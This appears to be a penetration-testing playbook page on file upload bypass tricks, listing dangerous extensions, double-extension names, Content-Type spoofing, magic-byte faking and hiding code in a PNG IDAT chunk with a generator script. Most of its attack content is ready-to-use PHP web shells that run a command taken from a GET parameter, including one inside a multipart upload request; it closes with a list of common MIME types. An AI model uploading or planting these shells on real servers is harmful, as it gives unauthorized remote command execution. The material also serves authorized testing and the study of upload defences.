> For the complete documentation index, see [llms.txt](https://jackmeister.gitbook.io/jackmeister-playbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jackmeister.gitbook.io/jackmeister-playbook/web-pentest/file-upload-tricks.md).

# File Upload Tricks

When uploading files , check for validation on :

1. **File extension**

   * Server side extension allowed ? :

   ```
   php
   phtml
   php4
   ```

   * Stacking / Double Extension

   ```
   .php.png
   .%20.php
   ```

Using gif (shell.php)

```
GIF89a;
<?php
system($_GET['cmd']);
?>
```

Advanced gif&#x20;

```http
Content-Disposition: form-data; name="upload"; filename="web.php"
Content-Type: image/png

GIF89a;
<?php
system($_GET['cmd']);
?>
```

2. **Content-Type header**

* Is server extension like php able to bypass the upload restriction ?

&#x20;     \- If yes , just change content-type header to like image and it will still run as php.

* Does the server validate content-type header like disallow application/json?

3. **Magic bytes (file hex value)**

* Does the server check **file signature** ?
* If no , can change file signature using `hexedit`

### PHP Function Exploit

`imagecopyresampled` `imagecreatefromstring`

<figure><img src="/files/6zLYORo39GzwjMidGYGi" alt=""><figcaption></figcaption></figure>

solution :Hide the webshell in the IDAT chunk of PNG

```http
https://github.com/huntergregal/PNG-IDAT-Payload-Generator/tree/master
```

```bash
python3 generate.py -m php -o webshell.png
```

Rename to `webshell.png.php`

#### Shell exec

php

```php
shell_exec() , exec() , system()
```

Examples

```php
<?php echo shell_exec($_GET['command']); ?>
<?php echo exec($_GET['command']); ?>
<?php echo system($_GET['command']); ?>
```

```php
<?php echo exec($_GET['e'].' 2>&1'); ?>
<?php system($_GET['e'].' 2>&1'); ?>
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>
```

### Content-Types of Common Files

#### Pictures :

```
image/png
image/jpeg
image/gif
```

#### JSON :

```
application/json
```

#### PHP :

```
application/x-php
application/x-www-form-urlencoded
multipart/form-data
application/octet-stream
```

#### TXT :

```
text/plain
```

#### XML :

```
application/xml  
text/xml
```

#### HTML :

```
text/html
```

#### JAVASCRIPT :

```
text/javascript
application/javascript
```

#### PDF

```
application/pdf
```

#### AUDIO

```
audio/mpeg
audio/wav
```

#### VIDEO

```
video/mp4
video/quicktime
```
